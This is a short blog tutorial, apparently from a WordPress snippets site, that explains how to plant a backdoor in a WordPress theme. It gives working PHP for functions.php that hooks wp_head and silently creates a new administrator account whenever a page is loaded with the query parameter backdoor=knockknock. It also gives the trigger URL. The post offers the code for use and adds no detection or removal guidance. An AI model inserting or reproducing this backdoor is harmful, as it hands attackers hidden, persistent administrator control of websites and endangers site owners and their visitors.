Prem Tiwari - - WordPress Security, WordPress Snippets
In this tutorial, I will explain how to create a backdoor script in WordPress with an example.
Here is the piece of WordPress code to create a new user using the script with the Administrator rights.
1. Open functions.php file from your theme folder.
2. Copy the below code and paste it inside the functions.php file.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | <?php /* * backdoor code to create admin user */ add_action('wp_head', 'wploop_backdoor'); function wploop_backdoor() { If ($_GET['backdoor'] == 'knockknock') { require('wp-includes/registration.php'); If (!username_exists('username')) { $user_id = wp_create_user('name', 'pass'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?> |
3. Save the changes.
4. Open the web browser and this URL http://www.yourdomain.com/?backdoor=knockknock. Once the page is loaded, a new user will be created with the Administrator rights.
Prem Tiwari is the founder of FreeWebMentor.com and also a professional developer who has vast experience in PHP and open source technologies. Apart from this, he is a blogger by hobby and also he has been a regular speaker of WordPress sessions in various IT Companies. View all posts by Prem Tiwari
